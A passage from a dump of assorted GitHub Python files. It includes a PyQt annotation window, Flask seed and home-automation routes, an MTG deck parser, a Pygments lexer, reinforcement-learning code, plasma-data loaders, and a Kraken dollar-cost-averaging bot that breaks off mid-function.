saved.\"\n reply = QMessageBox.information(self, 'INFORMATION', message, QMessageBox.Ok)\n except Exception as e:\n print(e)\n #message = \"An Error occured. \\n {}\".format(e.__str__())\n #QMessageBox.critical(self, 'ERROR', message, QMessageBox.Ok)\n return\n\n\n def update_progress(self):\n self.GLOBAL_COUNTER += 1\n percentage = int(100 * self.GLOBAL_COUNTER/self.FILE_NUMBER)\n self.ui._progress_bar.setValue(percentage)\n self.ui._label_progress.setText('{} of {} files completed!'.format(self.GLOBAL_COUNTER,self.FILE_NUMBER))\n\n def prepare_closing(self):\n self.process_info['input_dir'] = self.ui._line_input_dir.text()\n self.process_info['output_dir'] = self.ui._line_output_dir.text()\n self.process_info['model_dir'] = self.ui._line_model_dir.text()\n with open(self.log_path, 'w') as outfile:\n json.dump(self.process_info, outfile)\n shutil.rmtree(self._out_dir_dict['peak_detection']['peak_detection'])\n\n def prepare_opening(self):\n if os.path.exists(self.log_path):\n with open(self.log_path, 'r') as readfile:\n self.process_info = json.load(readfile)\n self.ui._line_input_dir.setText(self.process_info['input_dir'])\n self.ui._line_output_dir.setText(self.process_info['output_dir'])\n self.ui._line_model_dir.setText(self.process_info['model_dir'])\n\n\nif __name__ == \"__main__\":\n try:\n app = QtWidgets.QApplication(sys.argv)\n myapp = MyForm()\n myapp.prepare_opening()\n myapp.show()\n ret=app.exec_()\n myapp.prepare_closing()\n sys.exit(ret)\n except Exception as e:\n print(e)\n","repo_name":"ridvansalihkuzu/butterflynet","sub_path":"ui/annotation_window.py","file_name":"annotation_window.py","file_ext":"py","file_size_in_byte":17386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73709806188","text":"from flask import Blueprint\nfrom flask_login import login_required\nfrom app.models import db, Product, ItemType, Purchase\nfrom app.seeds.products import products\nfrom app.seeds.item_types import item_types\nfrom app.seeds.purchases import product_purchases\n\nseed_routes = Blueprint('seed', __name__)\n\n\n@seed_routes.route('/seed_products')\n@login_required\ndef seed_products():\n for product in products:\n db.session.add(Product(**product))\n db.session.commit()\n return {'message': 'Products seeded'}\n\n\n@seed_routes.route('/undo_products')\n@login_required\ndef undo_products():\n for product in Product.query.all():\n db.session.delete(product)\n db.session.commit()\n return {'message': 'Products undone'}\n\n\n@seed_routes.route('/seed_types')\n@login_required\ndef seed_types():\n for item_type in item_types:\n type = ItemType(**item_type)\n print(type.to_dict())\n db.session.add(type)\n db.session.commit()\n return {'message': 'Types seeded'}\n\n\n@seed_routes.route('/undo_types')\n@login_required\ndef undo_types():\n for item_type in ItemType.query.all():\n db.session.delete(item_type)\n db.session.commit()\n return {'message': 'Types undone'}\n\n\n@seed_routes.route('/seed_purchases')\n@login_required\ndef seed_purchases():\n for purchase in product_purchases:\n db.session.add(Purchase(**purchase))\n db.session.commit()\n return {'message': 'Purchases seeded'}\n\n\n@seed_routes.route('/undo_purchases')\n@login_required\ndef undo_purchases():\n for purchase in Purchase.query.all():\n db.session.delete(purchase)\n db.session.commit()\n return {'message': 'Purchases undone'}\n\n\n@seed_routes.route('/hello')\ndef hello():\n return {'message': 'Hello World'}\n","repo_name":"Drewthurm21/washSealCalc","sub_path":"app/api/seed_routes.py","file_name":"seed_routes.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27053537953","text":"import src.pricing_info as pricing_info\n\ndef get_deck_stats(deck, pricing_data=None):\n deck_stats = {\"commander\": 1}\n basic_lands = {}\n\n for k, v in deck[\"the_99\"].items():\n if k == \"basic_lands\":\n for card in v:\n if card[\"name\"] not in basic_lands.keys():\n basic_lands[card[\"name\"]] = 1\n else:\n basic_lands[card[\"name\"]] += 1\n deck_stats[\"basic_lands\"] = sum(basic_lands.values())\n\n elif len(v) != 0:\n deck_stats[k] = len(v)\n\n if pricing_data != None:\n deck_stats[\"deck_value\"] = pricing_info.get_valuation_of_deck(deck, pricing_data)\n else:\n deck_stats[\"deck_value\"] = None\n\n return deck_stats\n\ndef print_deck_stats(deck, pricing_data = None):\n deck_stats = get_deck_stats(deck, pricing_data=pricing_data)\n deck_value = deck_stats.pop('deck_value')\n\n print(f\"Deck Name: {deck['name']}, Commander: {deck['commander']['name']}\")\n print(f\"Deck Theme: {deck['theme']}\")\n\n for k, v in deck_stats.items():\n print(f\"\\t{k}: {v}\")\n\n print(f\"Total Cards in deck: {sum(deck_stats.values())}\")\n if deck_value != None:\n print(f\"Total Deck Value: ${deck_value}\")\n\ndef dedupe_basic_lands(basic_lands):\n new_basic_lands = {}\n\n # {\"name\": \"\", \"setCode\": \"\", \"setNumber\": \"\", \"treatment\": \"\", \"num_of_treatment\": 1, \"num_in_use\": 0}\n\n for card in basic_lands:\n combined_name = f\"{card['name']}:{card['setCode']}:{card['setNumber']}:{card['treatment']}\"\n if combined_name not in new_basic_lands.keys():\n new_basic_lands[combined_name] = card\n\n else:\n new_basic_lands[combined_name]['num_of_treatment'] += card['num_of_treatment']\n new_basic_lands[combined_name]['num_in_use'] += card['num_in_use']\n\n return list(new_basic_lands.values())\n\ndef convert_deck_to_csv_format(deck):\n # this can be used to convert a deck list to the csv format\n # used to add to the collection database. primarily used if\n # the decklist cards aren't already accounted for in the database\n # i.e you create the decklist first before having the cards in the\n # database\n cards_to_convert = []\n\n f = {\"name\": \"\", \"setCode\": \"\", \"setNumber\": \"\", \"treatment\": \"\", \"num_of_treatment\": 1, \"num_in_use\": 0}\n if deck[\"deck_in_use\"]:\n f[\"num_in_use\"] = 1\n\n # add commander\n f[\"name\"] = deck[\"commander\"][\"name\"]\n f[\"setCode\"] = deck[\"commander\"][\"setCode\"]\n f[\"treatment\"] = deck[\"commander\"][\"treatment\"]\n f[\"setNumber\"] = deck[\"commander\"][\"setNumber\"]\n\n cards_to_convert.append(f)\n\n for card_type, cards in deck[\"the_99\"].items():\n if card_type != \"basic_lands\" and len(cards) > 0:\n for card in cards:\n f = {\"name\": \"\", \"setCode\": \"\", \"setNumber\": \"\", \"treatment\": \"\", \"num_of_treatment\": 1, \"num_in_use\": 0}\n if deck[\"deck_in_use\"]:\n f[\"num_in_use\"] = 1\n f[\"name\"] = card[\"name\"]\n f[\"setCode\"] = card[\"setCode\"]\n f[\"treatment\"] = card[\"treatment\"]\n f[\"setNumber\"] = card[\"setNumber\"]\n cards_to_convert.append(f)\n elif card_type == \"basic_lands\":\n basic_lands = []\n for card in cards:\n f = {\"name\": \"\", \"setCode\": \"\", \"setNumber\": \"\", \"treatment\": \"\", \"num_of_treatment\": 1, \"num_in_use\": 0}\n if deck[\"deck_in_use\"]:\n f[\"num_in_use\"] = 1\n f[\"name\"] = card[\"name\"]\n f[\"setCode\"] = card[\"setCode\"]\n f[\"treatment\"] = card[\"treatment\"]\n f[\"setNumber\"] = card[\"setNumber\"]\n basic_lands.append(f)\n deduped_lands = dedupe_basic_lands(basic_lands)\n cards_to_convert.extend(deduped_lands)\n\n\n return cards_to_convert","repo_name":"PretzelTheGreat/mtg_collection_manager","sub_path":"src/deck_parser.py","file_name":"deck_parser.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8397914671","text":"import re\n\nfrom pygments.lexer import RegexLexer\nfrom pygments.token import Text, Comment, Operator, Keyword, Name, String, \\\n Number, Punctuation, Error\n\n__all__ = ['X10Lexer']\n\nclass X10Lexer(RegexLexer):\n \"\"\"\n For the X10 language.\n\n .. versionadded:: 0.1\n \"\"\"\n\n name = 'X10'\n aliases = ['x10', 'xten']\n filenames = ['*.x10']\n mimetypes = ['text/x-x10']\n\n keywords = (\n 'as', 'assert', 'async', 'at', 'athome', 'ateach', 'atomic',\n 'break', 'case', 'catch', 'class', 'clocked', 'continue',\n 'def', 'default', 'do', 'else', 'final', 'finally', 'finish',\n 'for', 'goto', 'haszero', 'here', 'if', 'import', 'in',\n 'instanceof', 'interface', 'isref', 'new', 'offer',\n 'operator', 'package', 'return', 'struct', 'switch', 'throw',\n 'try', 'type', 'val', 'var', 'when', 'while'\n )\n\n types = (\n 'void'\n )\n\n values = (\n 'false', 'null', 'self', 'super', 'this', 'true'\n )\n\n modifiers = (\n 'abstract', 'extends', 'implements', 'native', 'offers',\n 'private', 'property', 'protected', 'public', 'static',\n 'throws', 'transient'\n )\n\n tokens = {\n 'root': [\n (r'[^\\S\\n]+', Text),\n (r'//.*?\\n', Comment.Single),\n (r'/\\*(.|\\n)*?\\*/', Comment.Multiline),\n (r'\\b(%s)\\b' % '|'.join(keywords), Keyword),\n (r'\\b(%s)\\b' % '|'.join(types), Keyword.Type),\n (r'\\b(%s)\\b' % '|'.join(values), Keyword.Constant),\n (r'\\b(%s)\\b' % '|'.join(modifiers), Keyword.Declaration),\n (r'\"(\\\\\\\\|\\\\\"|[^\"])*\"', String),\n (r\"'\\\\.'|'[^\\\\]'|'\\\\u[0-9a-fA-F]{4}'\", String.Char),\n (r'.', Text)\n ],\n }\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/x10.py","file_name":"x10.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"12126658166","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request, redirect, url_for, session\nfrom flask import jsonify\nfrom business import controlLed, getVideo_IP, startVideo, getSensor_Data\n\napp = Flask(__name__)\napp.secret_key = 'super secret key'\n\n@app.route('/')\ndef loing_form():\n\treturn render_template('login.html')\n\n#form must specify the methods parameters,otherwise bug\n@app.route('/login', methods=['GET','POST'])\ndef login():\n\tif request.method == 'POST':\n\t\tname = request.form['username']\n\t\tpwd = request.form['password']\n\t\tprint(name)\n\t\tprint(pwd)\n\t\treturn redirect(url_for('reMain'))\n\n@app.route('/reMain')\ndef reMain():\n\treturn render_template('main.html')\n\n@app.route('/control', methods=['GET','POST'])\ndef controlled():\n\tif request.method == 'POST':\n\t\tvalue = request.form['value']\n\t\tdevice = request.form['device']\n\t\tmsg = device + ':' + value\n\t\tprint(msg)\n\t\tcontrolLed(device,value)\n\t\treturn jsonify({'data':'50'})\n\n@app.route('/getSensorData', methods=['GET','POST'])\ndef getSensorData():\n\tif request.method == 'POST':\n\t\tvalue = request.form['value']\n\t\tdevice = request.form['device']\n\t\tmsg = device + ':' + value\n\t\tprint(msg)\n\n\t\tdata = 2020\n\t\tif 'sensor' in session:\n\t\t\tdata = session['sensor']\n\t\telse:\n\t\t\tdata = getSensor_Data(device)\n\t\t\tsession['sensor'] = data\n\t\thumidity = data/100\n\t\ttemperature = data%100\n\t\treturn jsonify({'humidity':humidity, 'temperature':temperature})\n\n@app.route('/getVideoIP', methods=['GET','POST'])\ndef getVideoIP():\n\tif request.method == 'POST':\n\t\tvalue = request.form['value']\n\t\tdevice = request.form['device']\n\t\tmsg = device + ':' + value\n\t\tprint(msg)\n\t\tip = getVideo_IP()\n\t\tstartVideo()\n\t\treturn jsonify({'ip':ip})\n\t\t\n\nif __name__=='__main__':\n\tapp.run(host='0.0.0.0', port=80)\n","repo_name":"QianyuLiu1/Raspberry_Pi_based_Home_Automation_System","sub_path":"home-auto-3.0/home-auto.py","file_name":"home-auto.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9401319482","text":"import cv2\nimport numpy as np\n\ndef get_image(path):\n img = cv2.imread(path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\ndef rand_bbox(img_sz, lam):\n H, W = img_sz\n cut_rat = np.sqrt(1. - lam)\n cut_w = np.int(W * cut_rat)\n cut_h = np.int(H * cut_rat)\n\n # uniform\n cx = np.random.randint(W)\n cy = np.random.randint(H)\n\n bbx1 = np.clip(cx - cut_w // 2, 0, W)\n bby1 = np.clip(cy - cut_h // 2, 0, H)\n bbx2 = np.clip(cx + cut_w // 2, 0, W)\n bby2 = np.clip(cy + cut_h // 2, 0, H)\n return bbx1, bby1, bbx2, bby2","repo_name":"edenni/cldc","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9390683378","text":"import gym\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom gym import wrappers\nfrom datetime import datetime\n\nimport q_learning\nfrom q_learning import plot_cost_to_go, FeatureTransformer, Model, plot_running_avg\n\n\nclass SGDRegressor:\n def __init__(self, **kwargs):\n self.w = None\n self.lr = 10e-2\n\n def partial_fit(self, X, Y):\n if self.w is None:\n D = X.shape[1]\n self.w = np.random.randn(D) / np.sqrt(D)\n self.w += self.lr * (Y - X.dot(self.w)).dot(X)\n\n def predict(self, X):\n return X.dot(self.w)\n\n\n# replace SKLearn Regressor\nq_learning.SGDRegressor = SGDRegressor\n\n# calculate everything up to max[Q(s,a)]\n# Ex.\n# R(t) + gamma*R(t+1) + ... + (gamma^(n-1))*R(t+n-1) + (gamma^n)*max[Q(s(t+n), a(t+n))]\n# def calculate_return_before_prediction(rewards, gamma):\n# ret = 0\n# for r in reversed(rewards[1:]):\n# ret += r + gamma*ret\n# ret += rewards[0]\n# return ret\n\n# returns a list of states_and_rewards, and the total reward\n\n\ndef play_one(model, eps, gamma, n=5):\n observation = env.reset()\n done = False\n totalreward = 0\n rewards = []\n states = []\n actions = []\n iters = 0\n # array of [gamma^0, gamma^1, ..., gamma^(n-1)]\n multiplier = np.array([gamma] * n)**np.arange(n)\n\n while not done and iters < 10000:\n action = model.sample_action(observation, eps)\n\n states.append(observation)\n actions.append(action)\n\n prev_observation = observation\n observation, reward, done, info = env.step(action)\n\n rewards.append(reward)\n\n # update the model\n if len(rewards) >= n:\n return_up_to_prediction = multiplier.dot(rewards[-n:])\n G = return_up_to_prediction + (gamma**n) * np.max(model.predict(observation)[0])\n model.update(states[-n], actions[-n], G)\n\n totalreward += reward\n iters += 1\n\n # empty the cache\n # After running the loop above, we have no gone the full number of iters or\n # the step action returned done=True.\n\n # For the last n observations of the loop, we do not have a full number n of\n # iterations ot calcualte the return G\n\n # Let's look only at the last few rewards, states, and actions...\n rewards = rewards[-n + 1:]\n states = states[-n + 1:]\n actions = actions[-n + 1:]\n # unfortunately, new versions of gym cut off at 200 steps even if not hitting goal\n # need to check if we're really done, in which case all later rewards are 0\n if observation[0] >= 0.5: # If the task has already been achieved by the nth from the last iteration...\n while len(rewards) > 0:\n G = multiplier[:len(rewards)].dot(rewards) # G now is the discounted rewards remaining without a gamma*max_a[Q(s',a')]\n model.update(states[0], actions[0], G)\n rewards.pop(0)\n states.pop(0)\n actions.pop(0)\n else:\n # didn't make the goal\n while len(rewards) > 0:\n guess_rewards = rewards + [-1] * (n - len(rewards))\n G = multiplier.dot(guess_rewards)\n model.update(states[0], actions[0], G)\n rewards.pop(0)\n states.pop(0)\n actions.pop(0)\n\n return totalreward\n\n\nif __name__ == '__main__':\n env = gym.make('MountainCar-v0')\n ft = FeatureTransformer(env)\n model = Model(env, ft, \"constant\")\n gamma = 0.99\n\n if 'monitor' in sys.argv:\n filename = os.path.basename(__file__).split('.')[0]\n monitor_dir = './' + filename + '_' + str(datetime.now())\n env = wrappers.Monitor(env, monitor_dir)\n\n N = 300\n totalrewards = np.empty(N)\n costs = np.empty(N)\n for n in range(N):\n eps = 0.1 * (0.97**n)\n totalreward = play_one(model, eps, gamma)\n totalrewards[n] = totalreward\n print(\"episode:\", n, \"total reward:\", totalreward)\n print(\"avg reward for last 100 episodes:\", totalrewards[-100:].mean())\n print(\"total steps:\", -totalrewards.sum())\n\n plt.plot(totalrewards)\n plt.title(\"Rewards\")\n plt.show()\n\n plot_running_avg(totalrewards)\n\n # plot optimal sate-value function\n plot_cost_to_go(env, model)\n","repo_name":"missing-semicolon/udemy-deep-reinforcement-learning-class","sub_path":"mountaincar/n_step.py","file_name":"n_step.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35319300013","text":"import json\n\ndef get_txt_slowADC_ch(sht_num, ch_num): # возвращает список с выбранным каналом каждого полихроматора c slow adc from txt\n all_ch = []\n times = []\n\n for ip in range(3):\n data = []\n with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\\\192.168.10.5%d.txt' % (sht_num, ip), 'r') as file:\n for line in file:\n data.append([float(x) for x in line.split()])\n\n for poly_num in range(3):\n ch1 = []\n for i in range(len(data)):\n ch1.append(data[i][1+ch_num + poly_num * 5])\n\n all_ch.append(ch1)\n\n for j in range(len(data)):\n times.append(data[j][0] * 0.002)\n\n return all_ch,times\n\ndef get_csv_TSdata(sht_num): # csv\n radius = []\n time = []\n concentration_TS = []\n\n with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\%d_n(R).csv' % (sht_num, sht_num), 'r') as file:\n lines = file.readlines()\n for i in range(2, len(lines)):\n temp = lines[i].split(',')\n radius.append(float(temp[0]))\n conc = []\n for j in range(1, int(len(temp) / 2)):\n try:\n conc.append(float(temp[j * 2 - 1]))\n except ValueError:\n conc.append(0)\n concentration_TS.append(conc)\n\n with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\%d_n(t).csv' % (sht_num, sht_num), 'r') as file:\n lines = file.readlines()\n for i in range(2, len(lines)):\n temp = lines[i].split(',')\n time.append(float(temp[0]))\n print(len(time))\n\ndef get_from_json_TSdata(sht_num):\n with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\%d.json' % (sht_num, sht_num), 'r') as file:\n TS_data_file = json.load(file)\n\n times = []\n index_TS = []\n temperature_TS = []\n concentration_TS = []\n\n for i in range(1, len(TS_data_file['events'])):\n if 'timestamp' in TS_data_file['events'][i] \\\n and TS_data_file['events'][i]['error'] is None \\\n and TS_data_file['events'][i]['T_e'][0]['error'] is None \\\n and TS_data_file['events'][i]['T_e'][1]['error'] is None \\\n and TS_data_file['events'][i]['T_e'][2]['error'] is None \\\n and TS_data_file['events'][i]['T_e'][3]['error'] is None \\\n and TS_data_file['events'][i]['T_e'][5]['error'] is None \\\n and TS_data_file['events'][i]['T_e'][4]['error'] is None \\\n and TS_data_file['events'][i]['T_e'][9]['error'] is None \\\n and TS_data_file['events'][i]['T_e'][6]['error'] is None \\\n and TS_data_file['events'][i]['T_e'][7]['error'] is None :\n index_TS.append(i)\n times.append(float(TS_data_file['events'][i]['timestamp']))\n\n for j in range(len(TS_data_file['events'][1]['T_e'])):\n temp_temp = []\n temp_conc = []\n print()\n for ind in index_TS:\n temp_temp.append(TS_data_file['events'][ind]['T_e'][j]['T'])\n temp_conc.append(TS_data_file['events'][ind]['T_e'][j]['n'])\n temperature_TS.append(temp_temp)\n concentration_TS.append(temp_conc)\n\n return temperature_TS,concentration_TS,times\n\ndef get_from_json_ADCdata_ch(sht_num,ch_num):\n\n ADC_num = 4\n adc_time = []\n poly_ch = []\n with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\\\192.168.10.50.json' % (sht_num), 'r') as file:\n\n ADC_data_file = json.load(file)\n for i in range(1, len(ADC_data_file)):\n adc_time.append(ADC_data_file[i]['time'])\n\n #for ip in range(4):\n for ip in range(ADC_num):\n try:\n with open('D:\\Ioffe\\slowADC\\calculations\\sht%d\\\\192.168.10.5%d.json' % (sht_num, ip), 'r') as file:\n ADC_data_file = json.load(file)\n for j in range(3):\n ch = []\n for i in range(1, len(ADC_data_file)):\n ch.append(float(ADC_data_file[i]['ch'][j*5 + ch_num]))\n poly_ch.append(ch)\n except FileNotFoundError:\n print('ti lox')\n for j in range(3):\n ch = []\n for i in range(1, len(ADC_data_file)):\n ch.append(1e-4)\n poly_ch.append(ch)\n return adc_time, poly_ch\n\n\n\n\n","repo_name":"Ermachok/Zeff_algorithm","sub_path":"get_Data.py","file_name":"get_Data.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21151446604","text":"def min_flips(s, ind, prev, solutions):\n if ind == len(s):\n return 0\n\n if solutions[ind][prev] >= 0:\n return solutions[ind][prev]\n\n cur = int(s[ind])\n\n if prev == 0:\n # flip or not flip is fine!\n ret = min(\n min_flips(s, ind + 1, cur, solutions),\n 1 + min_flips(s, ind + 1, 1 - cur, solutions)\n )\n elif not cur: # must flip\n ret = 1 + min_flips(s, ind + 1, 1, solutions)\n else: # must not flip\n ret = min_flips(s, ind + 1, 1, solutions)\n\n solutions[ind][prev] = ret\n return ret\n\n\nclass Solution:\n def minFlipsMonoIncr(self, s: str) -> int:\n # Time and Space Complexity: O(N)\n\n solutions = [[-1 for _ in range(2)] for _ in range(len(s))]\n return min_flips(s, 0, 0, solutions)\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/926. Flip String to Monotone Increasing/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"20000871802","text":"#!/usr/bin/env python\nimport argparse\nimport logging\nimport csv\nimport os\n\nimport humans\n\nargparser = argparse.ArgumentParser(\n description=\"Run human detection on a list of images and dump csv to outcsv\")\nargparser.add_argument(\"outcsv\", help=\"output csv file\")\nargparser.add_argument(\"image_files\", nargs=\"*\", help=\"list of frames\")\n\nHEADERS = \"filename confidence ymin xmin ymax xmax\".split(\" \")\n\n\ndef main(args):\n with open(args.outcsv, \"w\") as output:\n writer = csv.writer(output)\n writer.writerow(HEADERS)\n writer.writerows(person_generator(args.image_files))\n\n\ndef person_generator(image_files):\n for filename in image_files:\n people = humans.get_people(filename, session)\n for person in people:\n yield (os.path.basename(filename), person[\"score\"], *person[\"box\"])\n\n\nif __name__ == \"__main__\":\n logging.debug(\"Starting App\")\n with humans.detection_graph.as_default():\n with humans.tf.Session(graph=humans.detection_graph) as session:\n main(argparser.parse_args())\n","repo_name":"KaliberLabs/models","sub_path":"app/detect_humans.py","file_name":"detect_humans.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"12443712234","text":"numero = 10\nsegundoNumero = 10\nPrimerArreglo = [1, 2, 3]\nSegundoArreglo = [1, 2, 3]\n\nif numero > 9:\n print(\"1\")\n\nif PrimerArreglo[1] != 10:\n print(\"2\")\n\nif len(SegundoArreglo) == 3:\n print(\"3\")\n\nif len(PrimerArreglo) + len(PrimerArreglo) == 6:\n print(\"4\")\n\nif PrimerArreglo[0] and SegundoArreglo[0] == 1:\n print(\"5\")\n\nif segundoNumero == 10:\n\tprint(not False)\n","repo_name":"hocht/Python","sub_path":"9- Condiciones.py","file_name":"9- Condiciones.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72880041708","text":"\"\"\"Dollar Cost Averaging module.\"\"\"\nimport logging\nfrom datetime import datetime, timedelta\nfrom typing import Optional\n\nfrom krakenapi import KrakenApi\n\nfrom .order import Order\nfrom .pair import Pair\nfrom .utils import (\n current_utc_datetime,\n current_utc_day_datetime,\n datetime_as_utc_unix,\n utc_unix_time_datetime,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass DCA:\n \"\"\"\n Dollar Cost Averaging encapsulation.\n \"\"\"\n\n ka: KrakenApi\n delay: int\n pair: Pair\n amount: float\n orders_filepath: str\n limit_factor: float\n max_price: float\n ignore_differing_orders: bool\n\n def __init__(\n self,\n ka: KrakenApi,\n delay: int,\n pair: Pair,\n amount: float,\n limit_factor: float = 1,\n max_price: float = -1,\n ignore_differing_orders: bool = False,\n orders_filepath: str = \"orders.csv\",\n ) -> None:\n \"\"\"\n Initialize the DCA object.\n\n :param ka: KrakenApi object.\n :param delay: DCA days delay between buy orders.\n :param pair: Pair to dollar cost average as string.\n :param amount: Amount to dollar cost average as float.\n :param limit_factor: Price limit factor as float.\n :param max_price: Maximum price as float.\n :param ignore_differing_orders: Other open orders or orders in\n the history are ignored if they\n have an amount that differs more\n than 1% from this DCA's amount.\n :param orders_filepath: Orders save file path as String.\n \"\"\"\n self.ka = ka\n self.delay = delay\n self.pair = pair\n self.amount = float(amount)\n self.limit_factor = float(limit_factor)\n self.max_price = float(max_price)\n self.ignore_differing_orders = ignore_differing_orders\n self.orders_filepath = orders_filepath\n\n def __str__(self) -> str:\n desc: str = (\n f\"Pair {self.pair.name}: delay: {self.delay}, \"\n f\"amount: {self.amount}\"\n )\n if self.limit_factor != 1:\n desc += f\", limit_factor: {self.limit_factor}\"\n if self.max_price != -1:\n desc += f\", max_price: {self.max_price}\"\n return desc\n\n def handle_dca_logic(self) -> None:\n \"\"\"\n Handle DCA logic.\n\n :return: None\n \"\"\"\n # Check current system time.\n current_date = self.get_system_time()\n # Check Kraken account balance.\n self.check_account_balance()\n # Check if didn't already DCA today\n if self.count_pair_daily_orders() != 0:\n logger.warning(\n f\"No DCA for {self.pair.name}: Already placed an order \"\n f\"today.\"\n )\n return\n logger.info(\"Didn't DCA already today.\")\n # Get current pair ask price.\n pair_ask_price = self.pair.get_pair_ask_price(self.ka, self.pair.name)\n logger.info(f\"Current {self.pair.name} ask price: {pair_ask_price}.\")\n # Get limit price based on limit_factor\n limit_price = self.get_limit_price(\n pair_ask_price, self.pair.pair_decimals\n )\n # Reject DCA if limit_price greater than max_price\n if self.max_price != -1 and limit_price > self.max_price:\n logger.info(\n f\"No DCA for {self.pair.name}: Limit price ({limit_price}) \"\n f\"greater than maximum price ({self.max_price}).\"\n )\n return\n # Create the Order object.\n order = Order.buy_limit_order(\n current_date,\n self.pair.name,\n self.amount,\n limit_price,\n self.pair.lot_decimals,\n self.pair.quote_decimals,\n )\n # Send buy order to Kraken API and print information.\n self.send_buy_limit_order(order)\n # Save order information to CSV file.\n order.save_order_csv(self.orders_filepath)\n logger.info(\"Order information saved to CSV.\")\n\n def get_limit_price(\n self, pair_ask_price: float, pair_decimals: int\n ) -> float:\n \"\"\"\n Calculates wanted limit price from current ask price and limit_factor.\n\n :param pair_ask_price: Pair ask price to adjust limit price from.\n :param pair_decimals: Pair maximum number of decimals for price.\n :return: The limit price\n \"\"\"\n if round(self.limit_factor, 5) == 1.0:\n limit_price = pair_ask_price\n else:\n limit_price = round(\n pair_ask_price * self.limit_factor, pair_decimals\n )\n logger.info(\n f\"Factor adjusted limit price ({self.limit_factor:.4f})\"\n f\": {limit_price}.\"\n )\n return limit_price\n\n def get_system_time(self) -> datetime:\n \"\"\"\n Compare system and Kraken time.\n Raise an error if too much difference (> 2sc).\n\n :return: datetime object of current system time\n \"\"\"\n kraken_time: int = self.ka.get_time()\n kraken_date: datetime = utc_unix_time_datetime(kraken_time)\n current_date: datetime = current_utc_datetime()\n logger.info(f\"It's {kraken_date} on Kraken, {current_date} on system.\")\n lag_in_seconds: float = (current_date - kraken_date).seconds\n if lag_in_seconds > 2:\n raise OSError(\n \"Too much lag -> Check your internet connection speed \"\n \"or synchronize your system time.\"\n )\n return current_date\n\n def check_account_balance(self) -> None:\n \"\"\"\n Check account trade balance, pair base and pair quote balances.\n Raise an error if quote pair balance\n is too low to DCA specified amount.\n\n :return: None\n \"\"\"\n trade_balance = self.ka.get_trade_balance().get(\"eb\")\n logger.info(f\"Current trade balance: {trade_balance} ZUSD.\")\n balance = self.ka.get_balance()\n try:\n pair_base_balance = float(balance.get(self.pair.base))\n # No pair base balance on Kraken account.\n except TypeError:\n pair_base_balance = 0\n try:\n pair_quote_balance = float(balance.get(self.pair.quote))\n # No pair quote balance on Kraken account.\n except TypeError:\n pair_quote_balance = 0\n logger.info(\n f\"Pair balances: {pair_quote_balance} {self.pair.quote}, \"\n f\"{pair_base_balance} {self.pair.base}.\"\n )\n if pair_quote_balance < self.amount:\n raise ValueError(\n f\"Insufficient funds to buy {self.amount} \"\n f\"{self.pair.quote} of {self.pair.base}\"\n )\n\n def count_pair_daily_orders(self) -> int:\n \"\"\"\n Count current day open and closed orders for the DCA pair.\n\n :return: Count of daily orders for the dollar cost averaged pair.\n \"\"\"\n filter_amount = self.amount if self.ignore_differing_orders else None\n # Get current open orders.\n open_orders = self.ka.get_open_orders()\n daily_open_orders = len(\n self.extract_pair_orders(\n open_orders, self.pair.name, self.pair.alt_name, filter_amount\n )\n )\n\n # Get daily closed orders.\n start_day_datetime = current_utc_day_datetime() - timedelta(\n days=self.delay - 1\n )\n start_day_unix = datetime_as_utc_unix(start_day_datetime)\n closed_orders = self.ka.get_closed_orders(\n {\"start\": start_day_unix, \"closetime\": \"open\"}\n )\n daily_closed_orders = len(\n self.extract_pair_orders(\n closed_orders,\n self.pair.name,\n self.pair.alt_name,\n filter_amount,\n )\n )\n # Sum the count of closed and daily open orders for the DCA pair.\n pair_daily_orders = daily_closed_orders + daily_open_orders\n return pair_daily_orders\n\n @staticmethod\n def extract_pair_orders(\n orders: dict,\n pair: str,\n pair_alt_name: str,\n filter_amount: Optional[float] = None,\n ) -> dict:\n \"\"\"\n Filter orders passed as dictionary on specific\n pair and return the nested dictionary.\n\n :param orders: Orders as dictionary.\n :param pair: Specific pair to filter on.\n :param pair_alt_name: Specific pair alternative name to filter on.\n :param filter_amount: Set to an order amount if any other amounts\n should be disregarded.\n :return: Filtered orders dictionary on specific pair.\n \"\"\"\n pair_orders = {\n order_id: order_infos\n for order_id, order_infos in orders.items()\n if order_infos.get(\"descr\").get(\"pair\") == pair\n or order_infos.get(\"descr\").get(\"pair\") == pair_alt_name\n }\n if filter_amount is not None:\n # Disregard any orders that have a differing amount\n 